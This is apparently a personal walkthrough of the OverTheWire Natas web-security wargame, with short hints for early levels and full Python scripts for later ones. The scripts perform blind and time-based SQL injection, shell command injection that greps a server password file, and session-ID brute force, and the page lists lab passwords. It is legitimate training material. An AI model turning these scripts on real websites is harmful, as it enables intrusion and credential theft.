Natas Solutions
natas levels
Level 0
Password is in the comments.
Level 1
Open inspect element through keyboard shortcut and remove the
oncontextmenu line from the body tag.
Level 2
When you view the source it shows a files/pixel.png element present on
the page. That implies that there is a file folder in the server
directory. Open the folder and see the file contents.
Level 3
Open robots.txt and see the disallowed folder. This is checked by web
crawlers to see what folders to not index.
Level 4
Change referer by setting up a proxy to localhost and then using mitmproxy.
Level 5
Change cookie by setting up localhost proxy and using mitmproxy.
Level 6
The PHP sauce has the file that has the secret word necessary for revealing the password.
Level 7
Check the HTML. It has a comment stating the page that has the password. Use that as a query in the URL to view the page.
Level 8
Check the PHP source they are providing. Get the string from the
hexadecimal, reverse it, and do a base64 decode on it.
Level 9
Comment out the query and grep the file that has the password since the input goes unsantized to passthru.
Level 10
Do the same as before. Asterisk, period and forward slashes are not there in the filtered characters.
Level 11
base64 decode the data cookie. XOR it with the given cookie to get the
XOR key. Once the key is received use it to change the cookie value to
yes and encrypt it. Then send that as the cookie.
Level 12
Create a .php file to cat the password. Change the html to send a php
through the form instead of a jpg. Send it and open it in the browser.
Level 13
Add the JPEG magic bytes to the raw hexdump of the file. Then upload it.
Level 14
Comment out the sql query ahead of the username.
Level 15
#!/bin/python import requests url = "http://natas15.natas.labs.overthewire.org" auth_username = "natas15" auth_password = "TTkaI7AWG4iDERztBcEyKV7kRXH1EZRB" characters = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789" password = "" iter = 1 test = True while test: test = False for i in characters: uri = url + "?debug=true" r = requests.get( uri, auth=(auth_username, auth_password), params={ "username": 'natas16" and SUBSTR(password, 1, ' + str(iter) + ')="' + password + i }, ) # print(r.text) # print("Letter", i, r.elapsed.total_seconds()) if "exists" in r.text: test = True iter += 1 password += i print("password:", password, flush=True) print("password:", password)
Level 16
#!/usr/bin/python import requests import string url = "http://natas16.natas.labs.overthewire.org" auth_username = "natas16" auth_password = "TRD7iZrd5gATjj9PkPEuaOlfEjHqj32V" characters = string.ascii_letters + string.digits # print(characters) default_needle = "Africans" password_chars = "" iter = 1 print("chars = ", end="") for i in characters: r = requests.get( url, auth=(auth_username, auth_password), params={ "needle": default_needle + "$(grep " + i + " /etc/natas_webpass/natas17)" }, ) # print(r.text) if default_needle not in r.text: password_chars += i print(i, end="", flush=True) print() print("password chars = ", password_chars) password = "" while True: for i in password_chars: r = requests.get( url, auth=(auth_username, auth_password), params={ "needle": default_needle + "$(grep ^" + password + i + " /etc/natas_webpass/natas17)" }, ) if default_needle not in r.text: password += i print(password)
A post method can also be used for this.
Level 17
#!/bin/python import requests url = "http://natas17.natas.labs.overthewire.org" auth_username = "natas17" auth_password = "XkEuChE0SbnKBvH1RU7ksIb9uuLmI7sd" characters = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789" password = "" iter = 1 r = requests.get( url, auth=(auth_username, auth_password), params={ "username": "natas18\" and IF(BINARY SUBSTR(password, 1, " + str(iter) + ")=\"" + password + "\", sleep(4), FALSE) and username = \"natas18" }, ) r = requests.get( url, auth=(auth_username, auth_password), params={ "username": "natas18\" and IF(BINARY SUBSTR(password, 1, " + str(iter) + ")=\"" + password + "\", sleep(4), FALSE) and username = \"natas18" }, ) test = True while test: test = False for i in characters: uri = url + "?debug=true" r = requests.get( uri, auth=(auth_username, auth_password), params={ "username": "natas18\" and IF(BINARY SUBSTR(password, 1, " + str(iter) + ")=\"" + password + i + "\", sleep(4), FALSE) and username = \"natas18" }, ) # print(r.text) print("Letter", i, r.elapsed.total_seconds()) if r.elapsed.total_seconds() > 4: test = True iter += 1 password += i print("password:", password, flush=True) print("password:", password)
Timing attack basically.
Level 18
#!/bin/python import requests url = "http://natas18.natas.labs.overthewire.org" uri = url + "?debug=true" auth_username = "natas18" auth_password = "8NEDUUxg8kFgPV84uLwvZkGn6okJQ6aq" characters = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789" password = "" iter = 1 s = requests.Session() s.auth = (auth_username, auth_password) for i in range (1, 641): print("i =", i) r = s.get(uri, cookies={"PHPSESSID": str(i)}) if "regular user" not in r.text: print(r.text) break
Brute force session ID's cuz that's literally all you can do tbh.
Level 19
#!/bin/python import requests url = "http://natas19.natas.labs.overthewire.org" uri = url + "?debug=true" auth_username = "natas19" auth_password = "8LMJEhKFbMKIL2mxQKjv0aEDdk7zpT0s" characters = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789" password = "" iter = 1 s = requests.Session() s.auth = (auth_username, auth_password) for i in range (1, 641): # print("i =", i) hexed = (str(i) + "-admin").encode().hex() # print(hexed) r = s.get(uri, cookies={"PHPSESSID": hexed}) if "regular user" not in r.text: print(r.text) break
Use cyberchef to get the fact that it is actually hex encoded.
- natas 8: a6bZCNYwdKqN5cGP11ZdtPg0iImQQhAB
- natas 11: 1KFqoJXi6hRaPluAmk8ESDW4fSysRoIg
- natas 12: YWqo0pjpcXzSIl5NMAVxg12QxeC1w9QG
- natas 14: qPazSJBmrmU7UQJv17MHk1PGC4DxZMEP
- natas 16: TRD7iZrd5gATjj9PkPEuaOlfEjHqj32V
- natas 18: 8nEduUXg8kFGPV84uLWvzKgn6oKjq6aq
- natas 20: guVaZ3ET35LbgbFMoaN5tFcYT1jEP7UH
